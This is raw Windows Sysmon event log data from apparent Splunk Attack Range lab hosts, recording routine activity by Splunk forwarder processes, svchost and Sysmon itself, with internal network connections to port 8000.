Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\saved-telemetry-pings\1868edc7-c857-4cda-bf8d-c3c683167443MD5=A52B87F27ACAD5B5FD356CF64E6370C7,SHA256=78F1FEA1C3D6ADAA352E8D8082491FD7B3FB62A6A8FEB3A5BB2553D7BBCBCAD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:48.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73CF47D03B906CECCC19BC169FE2F225,SHA256=434418EFB8238DD765AF641E28BC24D55DBCC19AE3B1BC2C966C5EC0E403E002,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:48.222{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CCC0447FD4B279FA8C12FB02A3670EE,SHA256=13B14485AF0921F60EAD1DBB6D765F2DC69229F1D3C363F8D08409AA50AA20B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:48.415{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C71EBD123762779D8028010D4D1311CA,SHA256=F2CF8205D19F4AAC870A79BEAFA499ECB32110035761E627091579437CB3F843,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:48.165{4F8D34B0-0D8B-6216-E303-000000003902}11722372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000213702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.508{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51139-false10.0.1.12-8000- 10341000x8000000000000000213733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0D8D-6216-E503-000000003902}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0D8D-6216-E503-000000003902}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.946{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0D8D-6216-E503-000000003902}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.947{4F8D34B0-0D8D-6216-E503-000000003902}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000213720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.680{4F8D34B0-0D8D-6216-E403-000000003902}5283928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000213719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.602{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C1B44C3FFB67009091EB632DAB08C72,SHA256=DD55CCE0A4F2C592CB06198861DF212EDC4002DE13422BAAD7225423F78D768E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.576{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53190-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:49.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747FAAE672B17B5CFD28210C7BDE930D,SHA256=AD2D9D0264D923DF1CA827206FC86FE1F8D4C404E5086D8C04E3446A3456733C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0D8D-6216-E403-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 